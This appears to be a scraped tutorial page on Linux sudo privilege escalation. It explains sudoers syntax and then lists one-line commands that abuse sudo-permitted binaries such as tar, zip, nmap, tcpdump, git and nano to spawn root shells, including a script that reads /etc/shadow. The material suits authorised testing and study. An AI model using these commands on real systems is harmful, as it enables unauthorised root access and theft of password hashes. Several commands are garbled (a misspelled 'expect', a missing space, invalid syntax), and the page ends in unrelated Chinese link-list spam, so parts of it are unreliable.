Index

  1. What is SUDO?
  2. Scenario.
  3. Sudoer FIle Syntax.
  4. Exploiting SUDO
    • zip
    • tar
    • strace
    • tcpdump
    • nmap
    • scp
    • except
    • nano & pico
    • git
    • ftp/gdb

What is SUDO ??

The SUDO(Substitute User and Do) command, allows users to delegate privileges resources proceeding activity logging. In other words, users can execute command under root ( or other users) using their own passwords instead of root’s one or without password depending upon sudoers setting The rules considering the decision making about granting an access, we can find in /etc/sudoers file.


Scenario.

During Red Teaming, sometime we encounter some situation where in we need to escalate our privilege to root or other users. an attacker can take advantage of sudo permission to execute a shell.


Sudoer File Syntax.

root ALL=(ALL) ALL

Explain 1: The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.

The first part is the user, the second is the terminal from where the user can use the sudocommand, the third part is which users he may act as, and the last one is which commands he may run when using.sudo

touhid ALL= /sbin/poweroff

Explain 2: The above command, makes the user touhid can from any terminal, run the command power off using touhid’s user password.

touhid ALL = (root) NOPASSWD: /usr/bin/find

Explain 3:  The above command, make the user touhid can from any terminal, run the command find as root user without password.


Exploiting SUDO Users.

To Exploiting sudo user u need to find which command u have to allow.
sudo -l

The above command shows which command have allowed to the current user.

Here sudo -l, Shows the user has all this binary allowed to do as on root user without password.

Let’s take a look at all binary one by one (which is mention in the index only) and Escalate Privilege to root user.


Using zip command

$ sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

Using tar command

$ sudo tar cf /dev/null testfile --checkpoint=1 --checkpointaction=exec=/bin/bash

Using strace command

$ sudo strace -o/dev/null /bin/bash

Using tcpdump command

$ echo $’id\ncat /etc/shadow’ > /tmp/.shell
$ chmod +x /tmp/.shell
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell-Z root

Using nmap command

$ echo "os.execute('/bin/sh')" > /tmp/shell.nse
$ sudo nmap --script=/tmp/shell.nse

Using scp command

$ sudo scp -S /path/yourscript x y

Using except command

$ sudo except spawn sh then sh

Using nano command

$ sudo nano -S /bin/bash

type your command and hit CTRL+T 

Using git command

$ sudo git help status

type:  !/bin/bash

Using gdb/ftp command

$ sudo ftp

type :  !/bin/sh

Abusing SUDO Advance for Linux Privilege Escalation的更多相关文章

  1. Basic Linux Privilege Escalation

    (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...

  2. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  3. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  4. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  5. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  6. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  7. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  8. FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

    /* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author by CurcolHekerLink * * Th ...

  9. [EXP]Memu Play 6.0.7 - Privilege Escalation

    # Exploit Title: Memu Play - Privilege Escalation (PoC) # Date: // # Author: Alejandra Sánchez # Ven ...

随机推荐

  1. Python报错ERROR: Command errored out with exit status 1:

    解决方法: 1.以管理员身份打开cmd 2.pip install robotframework-AutoItLibrary (本次安装时Python基于3.7.3,pip为最新版本) 3.安装成功

  2. iOS10 openURL方法跳转到设置界面

    问题 在iOS10之前,跳转到系统设置界面的某个指定界面的方式如下: //打开定位服务界面 NSURL*url=[NSURL URLWithString:@"prefs:root=Priva ...

  3. [TimLinux] JavaScript 元素动态显示

    1. css的opacity属性 这个属性用于:设置元素的不透明级别,取值范围:从 0.0 (完全透明)到 1.0(完全不透明),元素所在的文本流还在.这个属性的动态变化可以用来设置元素的淡入淡出效果 ...

  4. Spring之跨重定向请求传递数据

    摘要 在开发场景中,大部分数据都是使用请求转发(forward)进行传递,而使用重定向(redirect)传递数据可能比较少. 那么问题来了:请求中的数据生命周期存活时间只在一个请求转发(reques ...

  5. BZOJ [ZJOI2007]矩阵游戏(二分图匹配)

    1059: [ZJOI2007]矩阵游戏 Time Limit: 10 Sec  Memory Limit: 162 MBSubmit: 6390  Solved: 3133[Submit][Stat ...

  6. 牛客练习赛32 B题 Xor Path

    链接:https://ac.nowcoder.com/acm/contest/272/B来源:牛客网 题目描述 给定一棵n个点的树,每个点有权值.定义表示  到  的最短路径上,所有点的点权异或和. ...

  7. .net core 3.1简体中文语言包,英文只能提示变成中文!

    .net core 3.1简体中文语言包,英文只能提示变成中文!这个是我自己手动用谷歌翻译翻译的一批文档,已经把.net core3.1完全翻译了,由于是翻译器翻译,所以怕翻译有错漏,所以没有去掉英文 ...

  8. JavaEE基础(04):会话跟踪技术,Session和Cookie详解

    本文源码:GitHub·点这里 || GitEE·点这里 一.会话跟踪 1.场景描述 比如登录某个购物网站,身份识别成功后,在网站下单,支付 等操作,这些操作中当前登录用户信息必须是共享的,这样这些操 ...

  9. IP地址的配置

    1.右击 网上邻居 → 属性 2.右击 本地连接 → 属性 3.选择Internet协议(TCP/IP) → 属性 配置如下, 默认网关始终是网段的第一个地址 4.打开cmd → 输入 ipconfi ...

  10. Lua-Async 协程的高级用法

    Lua-Async 这是一个基于协程的异步调用库, 该库的设计思路类似JavaScript的Promise, 但相比Promise, 它有更多的灵活性. -- 引入Async local Async ...